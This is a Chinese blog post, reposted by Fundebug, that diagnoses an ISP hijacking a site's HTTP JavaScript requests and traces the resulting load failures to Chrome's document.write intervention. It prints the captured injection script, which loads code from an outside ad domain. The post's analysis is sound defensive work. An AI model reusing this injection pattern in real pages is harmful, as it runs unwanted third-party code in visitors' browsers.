編者按: Fundebug
的客戶通過分析我們提供的報警資訊,定位了一個非常棘手的問題—ISP劫持http請求。他的分析過程非常有意思,同時也提醒我們,應該及時支援HTTPS來保證站點安全。
原文:
ISP劫持http請求 作者: Mr_Qi 本文版權歸原作者所有。
最近業務系統經常受到前端報錯郵件
https://link.jianshu.com?t=https://yqfile.alicdn.com/img_5c0393066650d0f839d4fb3d4497ffb3.png
差別在于錯誤的js會先插入一個廣告js
為差別是否dns劫持檢視NetWork面闆
https://link.jianshu.com?t=https://yqfile.alicdn.com/img_1e838f900f8ff5c590b6a30b981fbf8a.png
IP正确并且為我方伺服器IP确認并非為DNS攻擊。
由于大面積出現沈陽聯通問題,(故而考慮應當為營運商問題?應該不會出現大範圍路由器被黑的可能吧)
傳回js如下
(function () {
try {
var o = 'm-_-m',
D = document;
if (!D.getElementById(o)) {
var j = 'http://yunxiu.f6car.com/kzf6/js/basic/XXX.js',
J = j + (~j.indexOf('?') ? '&' : '?') + new Date().getTime(),
M = 'http://pc.quansj.cn/?cid=08',
C = D.currentScript,
H = D.getElementsByTagName('head')[0],
N = function (s, i) {
var I = D.createElement('script');
I.type = 'text/JavaScript';
if (i) I.id = i;
I.src = s;
H.appendChild(I);
};
if (self == top) {
N(M, o);
}
if (!C) {
C = (function () {
var S = D.scripts,
l = S.length,
i = 0;
for (; i < l; ++i) {
if (S[i].src === j) {
return S[i];
}
}
})();
}
C && ((C.defer || C.async) ? N(J) : D.write('<script src="' + J + '"><' + '/script>'));
}
} catch (e) {}
})();
通過域名Whois反查
https://link.jianshu.com?t=https://yqfile.alicdn.com/img_bdf476b312be0c0c7c7e67132f2af7a9.png
發現旗下域名
https://link.jianshu.com?t=https://yqfile.alicdn.com/img_e6896569483be34a4e8f9fe0f180fd34.png
有好幾個都是廣告劫持網站
貌似和一個說脫口秀的(趙本山徒弟)同名………………該不是同一個人吧/(ㄒoㄒ)/~~
和沈陽聯通溝通後無果,拒不承認存在劫持。目前正在求助工信部,不知能否有解決方案。
https://link.jianshu.com?t=https://yqfile.alicdn.com/img_86f834ed10ef0aa5db39106f841bb552.png
github上已經有針對該位址的adblock了……明顯遼甯聯通
看了一下js選項,正常情況下會執行到
C&&((C.defer||C.async)?N(J):D.write('<script src="'+J+'"><'+'/script>'));
代碼做了判斷,如果支援defer或者async這直接append異步加載js,當不支援則直接通過document寫入(同步執行)
也就是說理論上會同步加載我們伺服器上的js~但是事實上出現了大量的js未加載到
經過查閱發現chrome有個設定(據說chrome55(?)+版本後優化)可以嘗試一下
chrome://flags/#disallow-doc-written-script-loads https://link.jianshu.com?t=https://yqfile.alicdn.com/img_9049f04408ac583c39ab5c90daf13769.png
具體說明如下
With this data in mind, Chrome, starting with version 55, intervenes on behalf of all users when we detect this known-bad pattern by changing howis handled in Chrome (See Chrome Status ). Specifically Chrome will not execute thedocument.write()
elements injected via<script>
when ****all**** of the following conditions are met:document.write()
Third party snippets sometimes use
- The user is on a slow connection, specifically when the user is on 2G. (In the future, the change might be extended to other users on slow connections, such as slow 3G or slow WiFi.)
- The
is in a top level document. The intervention does not apply to document.written scripts within iframes as they don't block the rendering of the main page.document.write()
- The script in the
is parser-blocking. Scripts with the 'document.write()
' or 'async
' attributes will still execute.defer
- The script is not hosted on the same site. In other words, Chrome will not intervene for scripts with a matching eTLD+1 (e.g. a script hosted on js.example.org inserted on www.example.org ).
- The script is not already in the browser HTTP cache. Scripts in the cache will not incur a network delay and will still execute.
- The request for the page is not a reload. Chrome will not intervene if the user triggered a reload and will execute the page as normal.
to load scripts. Fortunately, most third parties provide asynchronous loading alternatives , which allow third party scripts to load without blocking the display of the rest of the content on the page.document.write()
貌似我們不符合條件4 暫時先考慮一下
代碼format完後大驚失色……整個加載js的前提是畫面中沒有id為m--m的節點。否則不會進行加載js ,即不會執行document.write
如果悲催的是我們畫面中存在2個或兩個以上的js被劫持,那麼除了第一個js其餘均不會加載。
那麼檢視了一下js請求(帶有queryString),發現
https://link.jianshu.com?t=https://yqfile.alicdn.com/img_616f6db6f3e9459cf60e23324310270b.png
果然當時客戶的請求了commonjs,也就是commonjs也被劫持了。此刻畫面中出現了m--m節點。導緻其他被劫持的js不會加載真實的js………………
再說一下關于我們首頁的劫持(跳轉?)
https://link.jianshu.com?t=https://yqfile.alicdn.com/img_d9e4cfffd0a1b59f6c009a98500d785d.png
明顯也是江蘇寬帶(南京電信)的劫持……
歡迎加入
我們Fundebug的全棧BUG監控交流群: 622902485。
nodejs-qq-group.jpg